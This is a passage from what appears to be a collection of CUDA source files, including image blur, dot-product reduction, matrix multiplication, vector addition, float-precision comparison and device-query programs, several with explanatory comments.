"Unable to open file '%s'\n", "out"); exit(1); } //write the header file //image format fprintf(fp, "P6\n"); //image size fprintf(fp, "%d %d\n", x, y); // rgb component depth fprintf(fp, "%d\n", RGB_COMPONENT_COLOR); // pixel data fwrite(img, 3 * x, y, fp); fclose(fp); } unsigned char* readBMP(char* file_name, int &width, int &height) { FILE* img = 
fopen(file_name, "rb"); unsigned char header[54]; fread(header, sizeof(unsigned char), 54, img); width = *(int*)&header[18]; height = *(int*)&header[22]; int size = width * height * 3; unsigned char* r_img = (unsigned char*)malloc(size * sizeof(unsigned char)); fread(r_img, sizeof(unsigned char), size, img); fclose(img); return r_img; } void writeBMP(unsigned char* img, int width, int height) { FILE* f_img; int f_size = 54 + 3 * width* height; unsigned char file_header[14] = { 'B','M', 0,0,0,0, 0,0, 0,0, 54,0,0,0 }; unsigned char info_header[40] = { 40,0,0,0, 0,0,0,0, 0,0,0,0, 1,0, 24,0 }; unsigned char pad[3] = { 0,0,0 }; file_header[2] = (unsigned char)(f_size); file_header[3] = (unsigned char)(f_size >> 8); file_header[4] = (unsigned char)(f_size >> 16); file_header[5] = (unsigned char)(f_size >> 24); info_header[4] = (unsigned char)(width); info_header[5] = (unsigned char)(width >> 8); info_header[6] = (unsigned char)(width >> 16); info_header[7] = (unsigned char)(width >> 24); info_header[8] = (unsigned char)(height); info_header[9] = (unsigned char)(height >> 8); info_header[10] = (unsigned char)(height >> 16); info_header[11] = (unsigned char)(height >> 24); f_img = fopen("C:\\UCSP\\2019-I\\AP\\Practice\\blur\\blur\\img_blur.bmp", "wb"); fwrite(file_header, 1, 14, f_img); fwrite(info_header, 1, 40, f_img); for (int i = height - 1; i >= 0; i--) { fwrite(img + (width * (height - i - 1) * 3), 3, width, f_img); fwrite(pad, 1, (4 - (width * 3) % 4) % 4, f_img); } free(img); fclose(f_img); } // Blur GPU __global__ void blurKernel(unsigned char* out, unsigned char* in, int w, int h) { int Col = threadIdx.x + blockIdx.x * blockDim.x; int Row = threadIdx.y + blockIdx.y * blockDim.y; int Offset = Row * w + Col; if ((Col < w) && (Row < h)) { int pixValR = 0; int pixValG = 0; int pixValB = 0; int pixels = 0; // Get the average of the surrounding BLUR_SIZE x BLUR_SIZE box for (int blurRow = -BLUR_SIZE; blurRow < BLUR_SIZE; blurRow++) { for (int blurCol = -BLUR_SIZE; 
blurCol < BLUR_SIZE; blurCol++) { int curRow = Row + blurRow; int curCol = Col + blurCol; // Verify we have a valid image pixel if ((curRow > -1) && (curRow < h) && (curCol > -1) && (curCol < w)) { int curOffset = curRow * w + curCol; pixValR += in[curOffset * 3]; pixValG += in[curOffset * 3 + 1]; pixValB += in[curOffset * 3 + 2]; pixels++; // Keep track of number of pixels in the avg } } } // Write our new pixel value out out[Offset * 3] = (unsigned char)(pixValR / pixels); out[Offset * 3 + 1] = (unsigned char)(pixValG / pixels); out[Offset * 3 + 2] = (unsigned char)(pixValB / pixels); } } int main() { unsigned char* h_img_in; unsigned char* h_img_out; unsigned char* d_img_in; unsigned char* d_img_out; int width = 0; int height = 0; char* img_name = "D:\\Documentos\\Semestre 2020-2\\Computación Paralela y Distribuida\\Tareas\\CUDA\\AP-master\\CUDA\\Blur"; //char* img_name = "C:\\UCSP\\2019-I\\AP\\Practice\\blur\\blur\\lenna.ppm"; h_img_in = readBMP(img_name, width, height); //h_img_in = readPPM(img_name, width, height); cout << "Ready img_in" << endl; int size_grey = (width * height * sizeof(unsigned char)) * 3; int size_rgb = (width * height * sizeof(unsigned char)) * 3; h_img_out = (unsigned char*)malloc(size_grey * sizeof(unsigned char)); cout << "Ready img_out" << endl; cudaMalloc(&d_img_in, size_rgb); cudaMemcpy(d_img_in, h_img_in, size_rgb, cudaMemcpyHostToDevice); cudaMalloc(&d_img_out, size_grey); cudaMemcpy(d_img_out, h_img_out, size_grey, cudaMemcpyHostToDevice); dim3 dimGrid(ceil(width / 32.0), ceil(height / 32.0), 1); dim3 dimBlock(32, 32, 1); chrono::time_point<chrono::system_clock> GPU_Start, GPU_End; GPU_Start = chrono::system_clock::now(); blurKernel <<< dimGrid, dimBlock >>> (d_img_out, d_img_in, width, height); GPU_End = chrono::system_clock::now(); cout << "GPU: " << chrono::duration_cast<chrono::nanoseconds>(GPU_End - GPU_Start).count() << "ns." 
<< endl; cudaMemcpy(h_img_out, d_img_out, size_grey, cudaMemcpyDeviceToHost); writeBMP(h_img_out, width, height); //writePPM(h_img_out, width, height); cudaFree(d_img_in); cudaFree(d_img_out); free(h_img_in); free(h_img_out); return 0; }
21,438
#include <stdio.h>
#include <sys/time.h>

const int N_def (1 << 20);
const int threadsPerBlock = 32;
const int blocksPerGrid = 1;

// Per-block dot product: each thread accumulates a grid-stride partial sum,
// the block reduces those partials in dynamic shared memory, and lane 0
// stores the block's result in c[blockIdx.x].
// Requires: launch with threadsPerBlock*sizeof(double) dynamic shared bytes,
// and blockDim.x must be a power of two for the halving reduction.
__global__ void cuda_dot(int N, double *a, double *b, double *c)
{
    extern __shared__ double localDot[];

    int ix = threadIdx.x + blockIdx.x * blockDim.x;
    int localIndex = threadIdx.x;

    // Grid-stride accumulation of a[i]*b[i] into a per-thread partial.
    double localSum = 0;
    while (ix < N) {
        localSum += a[ix] * b[ix];
        ix += blockDim.x * gridDim.x;
    }

    // Publish this thread's partial, then reduce within the block.
    localDot[localIndex] = localSum;
    __syncthreads();

    for (int half = blockDim.x / 2; half != 0; half /= 2) {
        if (localIndex < half) {
            localDot[localIndex] += localDot[localIndex + half];
        }
        __syncthreads();
    }

    // One writer per block.
    if (localIndex == 0)
        c[blockIdx.x] = localDot[0];
}

// Host wrapper: copies a and b to the device, launches cuda_dot, and sums the
// per-block partial results on the CPU. Returns the full dot product.
double dot_gpu(int N, double *a, double *b, double *dev_a, double *dev_b, double *dev_partial_c)
{
    double *partial_c = (double*) malloc( blocksPerGrid*sizeof(double) );

    // Stage the input vectors on the device.
    cudaMemcpy(dev_a, a, N*sizeof(double), cudaMemcpyHostToDevice );
    cudaMemcpy(dev_b, b, N*sizeof(double), cudaMemcpyHostToDevice );

    dim3 block(threadsPerBlock);
    dim3 grid(blocksPerGrid);
    // Third launch argument: dynamic shared-memory bytes for localDot[].
    cuda_dot<<<grid,block,threadsPerBlock*sizeof(double)>>>(N, dev_a, dev_b, dev_partial_c );
    cudaDeviceSynchronize();
    cudaPeekAtLastError();

    // Fetch the per-block results and finish the reduction on the host.
    cudaMemcpy( partial_c, dev_partial_c, blocksPerGrid*sizeof(double), cudaMemcpyDeviceToHost );
    double dot = 0;
    for (int i = 0; i < blocksPerGrid; i++) {
        dot += partial_c[i];
    }
    free(partial_c);
    return dot;
}

// Sequential reference dot product.
double dot_cpu(int n, double *a, double *b)
{
    double sum = 0;
    for (int i = 0; i < n; i++) {
        sum += a[i]*b[i];
    }
    return sum;
}

/* Compute a dot product of two all-ones vectors and compare with N. */
int main( void )
{
    int N = N_def;

    double *a = (double*) malloc( N*sizeof(double) );
    double *b = (double*) malloc( N*sizeof(double) );

    // Device buffers, reused by dot_gpu.
    double *dev_a, *dev_b, *dev_partial_c;
    cudaMalloc((void**) &dev_a, N*sizeof(double));
    cudaMalloc((void**) &dev_b, N*sizeof(double));
    cudaMalloc((void**) &dev_partial_c, blocksPerGrid*sizeof(double) );

    // All-ones inputs, so the exact answer is N.
    for (int i = 0; i < N; i++) {
        a[i] = 1.0;
        b[i] = 1.0;
    }

    double c_gpu = dot_gpu(N,a,b,dev_a,dev_b,dev_partial_c);
    double s = N;   /* Sum of 1s */
    printf("%20s %10f\n","Dot product (GPU)", c_gpu);
    printf("%20s %10f\n","True dot product", s);

    cudaFree(dev_a);
    cudaFree(dev_b);
    cudaFree(dev_partial_c);
    free(a);
    free(b);
}
21,439
/* Copyright (c) 1993-2015, NVIDIA CORPORATION. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * * Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * Neither the name of NVIDIA CORPORATION nor the names of its * contributors may be used to endorse or promote products derived * from this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS ``AS IS'' AND ANY * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY * OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ /** * Matrix multiplication: C = A * B. * Host code. * * This sample implements matrix multiplication as described in Chapter 3 * of the programming guide. * It has been written for clarity of exposition to illustrate various CUDA * programming principles, not with the goal of providing the most * performant generic kernel for matrix multiplication. * * See also: * V. Volkov and J. Demmel, "Benchmarking GPUs to tune dense linear algebra," * in Proc. 2008 ACM/IEEE Conf. 
on Superconducting (SC '08), * Piscataway, NJ: IEEE Press, 2008, pp. Art. 31:1-11. */ // System includes #include <stdio.h> #include <assert.h> // CUDA runtime #include <cuda_runtime.h> // Helper functions and utilities to work with CUDA //#include <helper_functions.h> /** * Matrix multiplication (CUDA Kernel) on the device: C = A * B * wA is A's width and wB is B's width */ template <int BLOCK_SIZE> __global__ void matrixMulCUDA(float *C, float *A, float *B, int wA, int wB) { // Block index int bx = blockIdx.x; int by = blockIdx.y; // Thread index int tx = threadIdx.x; int ty = threadIdx.y; // Index of the first sub-matrix of A processed by the block int aBegin = wA * BLOCK_SIZE * by; // Index of the last sub-matrix of A processed by the block int aEnd = aBegin + wA - 1; // Step size used to iterate through the sub-matrices of A int aStep = BLOCK_SIZE; // Index of the first sub-matrix of B processed by the block int bBegin = BLOCK_SIZE * bx; // Step size used to iterate through the sub-matrices of B int bStep = BLOCK_SIZE * wB; // Csub is used to store the element of the block sub-matrix // that is computed by the thread float Csub = 0; // Loop over all the sub-matrices of A and B // required to compute the block sub-matrix for (int a = aBegin, b = bBegin; a <= aEnd; a += aStep, b += bStep) { // Declaration of the shared memory array As used to // store the sub-matrix of A __shared__ float As[BLOCK_SIZE][BLOCK_SIZE]; // Declaration of the shared memory array Bs used to // store the sub-matrix of B __shared__ float Bs[BLOCK_SIZE][BLOCK_SIZE]; // Load the matrices from device memory // to shared memory; each thread loads // one element of each matrix As[ty][tx] = A[a + wA * ty + tx]; Bs[ty][tx] = B[b + wB * ty + tx]; // Synchronize to make sure the matrices are loaded __syncthreads(); // Multiply the two matrices together; // each thread computes one element // of the block sub-matrix #pragma unroll for (int k = 0; k < BLOCK_SIZE; ++k) { Csub += As[ty][k] * 
Bs[k][tx]; } // Synchronize to make sure that the preceding // computation is done before loading two new // sub-matrices of A and B in the next iteration __syncthreads(); } // Write the block sub-matrix to device memory; // each thread writes one element int c = wB * BLOCK_SIZE * by + BLOCK_SIZE * bx; C[c + wB * ty + tx] = Csub; } void constantInit(float *data, int size, float val) { for (int i = 0; i < size; ++i) { data[i] = val; } } /** * Run a simple test of matrix multiplication using CUDA */ int matrixMultiply(dim3 &dimsA, dim3 &dimsB) { int block_size = 32; // Allocate host memory for matrices A and B unsigned int size_A = dimsA.x * dimsA.y; unsigned int mem_size_A = sizeof(float) * size_A; float *h_A = (float *)malloc(mem_size_A); unsigned int size_B = dimsB.x * dimsB.y; unsigned int mem_size_B = sizeof(float) * size_B; float *h_B = (float *)malloc(mem_size_B); // Initialize host memory const float valB = 0.001f; constantInit(h_A, size_A, 1.0f); constantInit(h_B, size_B, valB); // Allocate device memory float *d_A, *d_B, *d_C; // Allocate host matrix C dim3 dimsC(dimsB.x, dimsA.y, 1); unsigned int mem_size_C = dimsC.x * dimsC.y * sizeof(float); float *h_C = (float *) malloc(mem_size_C); if (h_C == NULL) { fprintf(stderr, "Failed to allocate host matrix C!\n"); exit(EXIT_FAILURE); } cudaError_t error; error = cudaMalloc((void **) &d_A, mem_size_A); if (error != cudaSuccess) { printf("cudaMalloc d_A returned error code %d, line(%d)\n", error, __LINE__); exit(EXIT_FAILURE); } error = cudaMalloc((void **) &d_B, mem_size_B); if (error != cudaSuccess) { printf("cudaMalloc d_B returned error code %d, line(%d)\n", error, __LINE__); exit(EXIT_FAILURE); } error = cudaMalloc((void **) &d_C, mem_size_C); if (error != cudaSuccess) { printf("cudaMalloc d_C returned error code %d, line(%d)\n", error, __LINE__); exit(EXIT_FAILURE); } // copy host memory to device error = cudaMemcpy(d_A, h_A, mem_size_A, cudaMemcpyHostToDevice); if (error != cudaSuccess) { 
printf("cudaMemcpy (d_A,h_A) returned error code %d, line(%d)\n", error, __LINE__); exit(EXIT_FAILURE); } error = cudaMemcpy(d_B, h_B, mem_size_B, cudaMemcpyHostToDevice); if (error != cudaSuccess) { printf("cudaMemcpy (d_B,h_B) returned error code %d, line(%d)\n", error, __LINE__); exit(EXIT_FAILURE); } // Setup execution parameters dim3 threads(block_size, block_size); dim3 grid(dimsB.x / threads.x, dimsA.y / threads.y); // Create and start timer printf("\tRunning Matrix Multiplication CUDA Kernel...\n"); // Performs warmup operation using matrixMul CUDA kernel if (block_size == 16) { matrixMulCUDA<16><<< grid, threads >>>(d_C, d_A, d_B, dimsA.x, dimsB.x); } else { matrixMulCUDA<32><<< grid, threads >>>(d_C, d_A, d_B, dimsA.x, dimsB.x); } cudaDeviceSynchronize(); // Allocate CUDA events that we'll use for timing cudaEvent_t start; error = cudaEventCreate(&start); if (error != cudaSuccess) { fprintf(stderr, "Failed to create start event (error code %s)!\n", cudaGetErrorString(error)); exit(EXIT_FAILURE); } cudaEvent_t stop; error = cudaEventCreate(&stop); if (error != cudaSuccess) { fprintf(stderr, "Failed to create stop event (error code %s)!\n", cudaGetErrorString(error)); exit(EXIT_FAILURE); } // Record the start event error = cudaEventRecord(start, NULL); if (error != cudaSuccess) { fprintf(stderr, "Failed to record start event (error code %s)!\n", cudaGetErrorString(error)); exit(EXIT_FAILURE); } // Execute the kernel int nIter = 300; for (int j = 0; j < nIter; j++) { if (block_size == 16) { matrixMulCUDA<16><<< grid, threads >>>(d_C, d_A, d_B, dimsA.x, dimsB.x); } else { matrixMulCUDA<32><<< grid, threads >>>(d_C, d_A, d_B, dimsA.x, dimsB.x); } } // Record the stop event error = cudaEventRecord(stop, NULL); if (error != cudaSuccess) { fprintf(stderr, "Failed to record stop event (error code %s)!\n", cudaGetErrorString(error)); exit(EXIT_FAILURE); } // Wait for the stop event to complete error = cudaEventSynchronize(stop); if (error != cudaSuccess) { 
fprintf(stderr, "Failed to synchronize on the stop event (error code %s)!\n", cudaGetErrorString(error)); exit(EXIT_FAILURE); } float msecTotal = 0.0f; error = cudaEventElapsedTime(&msecTotal, start, stop); if (error != cudaSuccess) { fprintf(stderr, "Failed to get time elapsed between events (error code %s)!\n", cudaGetErrorString(error)); exit(EXIT_FAILURE); } // Compute and print the performance float msecPerMatrixMul = msecTotal / nIter; double flopsPerMatrixMul = 2.0 * (double)dimsA.x * (double)dimsA.y * (double)dimsB.x; double gigaFlops = (flopsPerMatrixMul * 1.0e-9f) / (msecPerMatrixMul / 1000.0f); printf( "\tPerformance= %.2f GFlop/s, Time= %.3f msec, Size= %.0f Ops\n", gigaFlops, msecPerMatrixMul, flopsPerMatrixMul); // Copy result from device to host error = cudaMemcpy(h_C, d_C, mem_size_C, cudaMemcpyDeviceToHost); if (error != cudaSuccess) { printf("cudaMemcpy (h_C,d_C) returned error code %d, line(%d)\n", error, __LINE__); exit(EXIT_FAILURE); } printf("\tChecking computed result for correctness: "); bool correct = true; for (int i = 0; i < (int)(dimsC.x * dimsC.y); i++) { if (fabs(h_C[i] - (dimsA.x * valB)) > 1e-5) { printf("Error! Matrix[%05d]=%.8f, ref=%.8f error term is > 1e-5\n", i, h_C[i], dimsA.x*valB); correct = false; } } printf("%s\n", correct ? "OK" : "FAIL"); // Clean up memory free(h_A); free(h_B); free(h_C); cudaFree(d_A); cudaFree(d_B); cudaFree(d_C); printf("\n\tNote: For peak performance, please refer to the matrixMulCUBLAS example.\n"); if (correct) { return EXIT_SUCCESS; } else { return EXIT_FAILURE; } }
21,440
// Cross-entropy loss from softmax probabilities and integer class labels.
// For each i in [0, height): target[i] = -ln(p + tiny), where
// p = mat[height * labels[i] + i], i.e. element i of the column selected by
// labels[i] with a column stride of `height`. `tiny` guards against log(0);
// __logf is the fast-math natural log. Grid-stride loop, so any launch
// configuration covers all `height` outputs. `width` is accepted but unused.
// NOTE(review): despite the "RowMajor" name, the indexing uses a stride of
// `height` between columns — confirm the intended matrix layout with callers.
#include "includes.h" __global__ void kSoftMaxCrossEntropyRowMajor(float* mat, float* labels, float* target, unsigned int width, unsigned int height, float tiny) { const unsigned int idx = blockIdx.x * blockDim.x + threadIdx.x; const unsigned int numThreads = blockDim.x * gridDim.x; for (unsigned int i = idx; i < height; i += numThreads) { target[i] = -__logf(mat[height * (int)labels[i] + i] + tiny); } }
21,441
// Rishabh Agarwal - 18JE0676 #include <bits/stdc++.h> #include <cuda.h> using namespace std; // kernel functions // compare single point and double point __global__ void CompareKernel(float *da, double *db) { int tid = blockIdx.x * blockDim.x + threadIdx.x; if (tid == 0) { *da = 20.234; *db = 20.234; } } // single precision operations __global__ void SinglePrecisionOperationsKernel(float *fres_add, float *fres_sub, float *fres_mul, float *fres_div) { float f1 = 45.238; float f2 = 26.547; *fres_add = f1 + f2; *fres_sub = f1 - f2; *fres_mul = f1 * f2; *fres_div = f1 / f2; } // double precision operations __global__ void DoublePrecisionOperationsKernel(double *dres_add, double *dres_sub, double *dres_mul, double *dres_div) { double d1 = 74.112; double d2 = 55.656; *dres_add = d1 + d2; *dres_sub = d1 - d2; *dres_mul = d1 * d2; *dres_div = d1 / d2; } // main() int main() { float host_f = 20.234, device_f; double host_d = 20.234, device_d; float *da; double *db; cudaMalloc(&da, sizeof(float)); cudaMalloc(&db, sizeof(double)); CompareKernel<<<1, 32>>>(da, db); cudaMemcpy(&device_f, da, sizeof(float), cudaMemcpyDeviceToHost); cudaMemcpy(&device_d, db, sizeof(double), cudaMemcpyDeviceToHost); cudaFree(da); cudaFree(db); cout << "Single point float precision number in host: " << host_f << "\n"; cout << "Single point float precision number in device: " << device_f << "\n"; cout << ((host_f == device_f) ? "Equal\n" : "Unequal\n"); cout << "Double point float precision number in host: " << host_d << "\n"; cout << "Double point float precision number in device: " << device_d << "\n"; cout << ((host_d == device_d) ? 
"Equal\n" : "Unequal\n"); // host and device storing variables float f1 = 45.238, f2 = 26.547; float device_f_add, device_f_sub, device_f_mul, device_f_div; double d1 = 74.112, d2 = 55.656; double device_d_add, device_d_sub, device_d_mul, device_d_div; // pointers to send in kernel float *fres_add, *fres_sub, *fres_mul, *fres_div; double *dres_add, *dres_sub, *dres_mul, *dres_div; // allocation memories cudaMalloc(&fres_add, sizeof(float)); cudaMalloc(&fres_sub, sizeof(float)); cudaMalloc(&fres_mul, sizeof(float)); cudaMalloc(&fres_div, sizeof(float)); cudaMalloc(&dres_add, sizeof(double)); cudaMalloc(&dres_sub, sizeof(double)); cudaMalloc(&dres_mul, sizeof(double)); cudaMalloc(&dres_div, sizeof(double)); // calling kernel SinglePrecisionOperationsKernel<<<1, 32>>>( fres_add, fres_sub, fres_mul, fres_div ); DoublePrecisionOperationsKernel<<<1, 32>>>( dres_add, dres_sub, dres_mul, dres_div ); // copying back to host cudaMemcpy(&device_f_add, fres_add, sizeof(float), cudaMemcpyDeviceToHost); cudaMemcpy(&device_f_sub, fres_sub, sizeof(float), cudaMemcpyDeviceToHost); cudaMemcpy(&device_f_mul, fres_mul, sizeof(float), cudaMemcpyDeviceToHost); cudaMemcpy(&device_f_div, fres_div, sizeof(float), cudaMemcpyDeviceToHost); cudaMemcpy(&device_d_add, dres_add, sizeof(double), cudaMemcpyDeviceToHost); cudaMemcpy(&device_d_sub, dres_sub, sizeof(double), cudaMemcpyDeviceToHost); cudaMemcpy(&device_d_mul, dres_mul, sizeof(double), cudaMemcpyDeviceToHost); cudaMemcpy(&device_d_div, dres_div, sizeof(double), cudaMemcpyDeviceToHost); // freeing memory cudaFree(fres_add); cudaFree(fres_sub); cudaFree(fres_mul); cudaFree(fres_div); cudaFree(dres_add); cudaFree(dres_sub); cudaFree(dres_mul); cudaFree(dres_div); cout << "\nNow performing single point precision operations:\n\n"; cout << "Single point precision addition in host: " << f1+f2 << "\n"; cout << "Single point precision addition in device: " << device_f_add << "\n"; if(device_f_add == f1 + f2) { cout << "Equal\n\n"; } else { cout 
<< "Unequal\n\n"; } cout << "Single point precision subtraction in host: " << f1-f2 << "\n"; cout << "Single point precision subtraction in device: " << device_f_sub << "\n"; if(device_f_sub == f1 - f2) { cout << "Equal\n\n"; } else { cout << "Unequal\n\n"; } cout << "Single point precision multiplication in host: " << f1*f2 << "\n"; cout << "Single point precision multiplication in device: " << device_f_mul << "\n"; if(device_f_mul == f1 * f2) { cout << "Equal\n\n"; } else { cout << "Unequal\n\n"; } cout << "Single point precision division in host: " << f1/f2 << "\n"; cout << "Single point precision division in device: " << device_f_div << "\n"; if(device_f_div == f1 / f2) { cout << "Equal\n\n"; } else { cout << "Unequal\n\n"; } cout << "Now performing double point precision operations:\n\n"; cout << "Double point precision addition in host: " << d1+d2 << "\n"; cout << "Double point precision addition in device: " << device_d_add << "\n"; if(device_d_add == d1 + d2) { cout << "Equal\n\n"; } else { cout << "Unequal\n\n"; } cout << "Double point precision subtraction in host: " << d1-d2 << "\n"; cout << "Double point precision subtraction in device: " << device_d_sub << "\n"; if(device_d_sub == d1 - d2) { cout << "Equal\n\n"; } else { cout << "Unequal\n\n"; } cout << "Double point precision multiplication in host: " << d1*d2 << "\n"; cout << "Double point precision multiplication in device: " << device_d_mul << "\n"; if(device_d_mul == d1 * d2) { cout << "Equal\n\n"; } else { cout << "Unequal\n\n"; } cout << "Double point precision division in host: " << d1/d2 << "\n"; cout << "Double point precision division in device: " << device_d_div << "\n"; if(device_d_div == d1 / d2) { cout << "Equal\n\n"; } else { cout << "Unequal\n\n"; } return 0; }
21,442
#include <stdio.h>
#include <stdlib.h>

// Element-wise vector addition: one single-thread block per element,
// c[i] = a[i] + b[i]. Each block also emits a debug "hello ".
__global__ void add(int *a, int *b, int *c)
{
    int i = blockIdx.x;
    c[i] = a[i] + b[i];
    printf("hello ");
}

#define N 512

int main(void)
{
    int size = N * sizeof(int);

    // Device copies of the two inputs and the result.
    int *d_a, *d_b, *d_c;
    cudaMalloc((void **)&d_a, size);
    cudaMalloc((void **)&d_b, size);
    cudaMalloc((void **)&d_c, size);

    // Host copies; inputs filled with small pseudo-random values.
    int *a = (int *)malloc(size);
    int *b = (int *)malloc(size);
    for (int i = 0; i < N; i++) {
        a[i] = rand() % 10;
        b[i] = rand() % 10;
    }
    int *c = (int *)malloc(size);

    // Stage the inputs on the device.
    cudaMemcpy(d_a, a, size, cudaMemcpyHostToDevice);
    cudaMemcpy(d_b, b, size, cudaMemcpyHostToDevice);

    // Launch add() on the GPU: N blocks of one thread each.
    add<<<N, 1>>>(d_a, d_b, d_c);

    // Blocking copy retrieves the result (and synchronizes with the kernel).
    cudaMemcpy(c, d_c, size, cudaMemcpyDeviceToHost);

    // Show the first ten sums.
    for (int i = 0; i < 10; i++) {
        printf("Executed: %d + %d = %d\n", a[i], b[i], c[i]);
    }

    // Cleanup.
    free(a);
    free(b);
    free(c);
    cudaFree(d_a);
    cudaFree(d_b);
    cudaFree(d_c);
    return 0;
}
21,443
#include "includes.h"

// Grid-stride element-wise add: y[i] = x[i] + y[i] for every i in [0, n).
// Each thread starts at its global index and strides by the total number of
// launched threads, so any grid/block configuration covers the full range.
__global__ void addGridThreads(int n, float *x, float *y)
{
    int first = blockIdx.x * blockDim.x + threadIdx.x;
    int step = blockDim.x * gridDim.x;
    for (int i = first; i < n; i += step) {
        y[i] = x[i] + y[i];
    }
}
21,444
/*
 * Author: fredy m, uaem (desonses@gmail.com).
 * N x N matrix multiplication with the inputs in __constant__ memory.
 * BUG FIX: the kernel previously accumulated with `dev_C[pos] += ...` into
 * memory freshly returned by cudaMalloc, which is NOT zero-initialized, so
 * the printed product contained garbage. It now accumulates in a register
 * and stores once. (The unused `int suma` was removed as well.)
 */
#include <device_functions.h>
#include <stdio.h>
#include <stdlib.h>
#include <cuda_runtime.h>
#include <device_launch_parameters.h>

#define N 3

// Inputs live in constant memory: read-only in the kernel and served by the
// broadcast constant cache, a good fit for this small fixed-size problem.
__constant__ float dev_A[N][N];
__constant__ float dev_B[N][N];

// Kernel: each thread computes one output element C[fila][columna].
__global__ void multiplicacion(float *dev_C)
{
    int columna = threadIdx.x;
    int fila = threadIdx.y;
    int pos = columna + N * fila;
    if (columna < N && fila < N) {
        // Accumulate in a register, then write the element exactly once.
        float suma = 0.0f;
        for (int k = 0; k < N; k++) {
            suma += dev_A[fila][k] * dev_B[k][columna];
        }
        dev_C[pos] = suma;
    }
}

int main(int argc, char** argv)
{
    float *hst_A, *hst_B, *hst_C;
    float *dev_C;
    int size = N * N * sizeof(float);

    // Host allocations.
    hst_A = (float*)malloc(size);
    hst_B = (float*)malloc(size);
    hst_C = (float*)malloc(size);

    // Device allocation for the result.
    cudaMalloc((void**)&dev_C, size);

    // Fill the input matrices: A = 1..9, B = 0..8 (row-major).
    for (int i = 0; i < N*N; i++) {
        hst_A[i] = float(i) + 1;
        hst_B[i] = float(i);
    }

    // Copy the inputs into constant memory, checking each transfer.
    cudaError_t error = cudaMemcpyToSymbol(dev_A, hst_A, size);
    if (error != cudaSuccess) {
        printf("Error Memoria constante dev_A to hst_A\n");
    }
    error = cudaMemcpyToSymbol(dev_B, hst_B, size);
    if (error != cudaSuccess) {
        printf("Error Memoria constante dev_B to hst_B\n");
    }

    // Launch one block of N x N threads: one thread per output element.
    dim3 bloques(1);
    dim3 hilos(N, N);
    multiplicacion<<<bloques, hilos>>>(dev_C);

    // Retrieve the result (blocking copy synchronizes with the kernel).
    cudaMemcpy(hst_C, dev_C, size, cudaMemcpyDeviceToHost);

    // Print the inputs and the product.
    printf("\nMatriz A:\n");
    for (int i = 0; i < N; i++) {
        for (int j = 0; j < N; j++) {
            printf("%.2f\t", hst_A[j + i * N]);
        }
        printf("\n");
    }
    printf("\nMatriz B:\n");
    for (int i = 0; i < N; i++) {
        for (int j = 0; j < N; j++) {
            printf("%.2f\t", hst_B[j + i * N]);
        }
        printf("\n");
    }
    printf("\n");
    printf("multiplicacion de matrices A y B:\n");
    for (int i = 0; i < N; i++) {
        for (int j = 0; j < N; j++) {
            printf("%.2f\t", hst_C[j + i * N]);
        }
        printf("\n");
    }
    printf("\n pulsa INTRO para salir:\n");
    fflush(stdin);
    char tecla = getchar();
    (void)tecla;

    // Release resources (previously leaked).
    cudaFree(dev_C);
    free(hst_A);
    free(hst_B);
    free(hst_C);
    return 0;
}
21,445
#include <stdio.h>

// Enumerate every CUDA device and print its key properties.
// BUG FIX: the size_t-typed fields (totalGlobalMem, totalConstMem,
// sharedMemPerBlock, memPitch, textureAlignment) were printed with %ld,
// which mismatches size_t on LLP64 platforms (e.g. 64-bit Windows, where
// long is 32-bit); they now use %zu.
int main( void )
{
    cudaDeviceProp prop;
    int count;
    cudaGetDeviceCount(&count);
    for (int i = 0; i < count; i++) {
        cudaGetDeviceProperties(&prop, i);
        printf( " --- General Information for device %d ---\n", i );
        printf( "Device %d: %s\n", i, prop.name );
        printf( "CUDA capability Major.Minor version: %d.%d\n", prop.major, prop.minor );
        printf( "Total global mem: %.0f MBytes (%zu bytes)\n",
                prop.totalGlobalMem/1048576.0f, prop.totalGlobalMem );
        // clockRate/memoryClockRate are reported in kHz.
        printf( "GPU Max Clock rate: %.0f MHz (%0.2f GHz)\n",
                prop.clockRate*1e-3f, prop.clockRate*1e-6f );
        printf( "Memory Clock rate: %.0f Mhz\n", prop.memoryClockRate * 1e-3f );
        printf( "Memory Bus Width: %d-bit\n", prop.memoryBusWidth );
        printf( "Total constant memory: %zu bytes\n", prop.totalConstMem );
        printf( "Shared memory per block: %zu bytes\n", prop.sharedMemPerBlock );
        printf( "Registers per block: %d\n", prop.regsPerBlock );
        printf( "Warp size: %d\n", prop.warpSize );
        printf( "Max memory pitch: %zu bytes\n", prop.memPitch );
        printf( "Texture Alignment: %zu bytes\n", prop.textureAlignment );
        printf( "Multiprocessor count: %d\n", prop.multiProcessorCount );
        printf( "Max threads per block: %d\n", prop.maxThreadsPerBlock );
        printf( "Max thread block dimensions (x,y,z): (%d, %d, %d)\n",
                prop.maxThreadsDim[0], prop.maxThreadsDim[1], prop.maxThreadsDim[2] );
        printf( "Max grid dimensions (x,y,z): (%d, %d, %d)\n",
                prop.maxGridSize[0], prop.maxGridSize[1], prop.maxGridSize[2] );
        printf( "Concurrent copy and kernel execution: " );
        if (prop.deviceOverlap) printf( "Enabled\n" );
        else printf( "Disabled\n");
        printf( "Run time limit on kernels : " );
        if (prop.kernelExecTimeoutEnabled) printf( "Enabled\n" );
        else printf( "Disabled\n" );
        printf( "\n" );
    }
}
21,446
#include "includes.h"

// Store the sum of the two scalar arguments into the location *c.
__global__ void add(int a, int b, int *c)
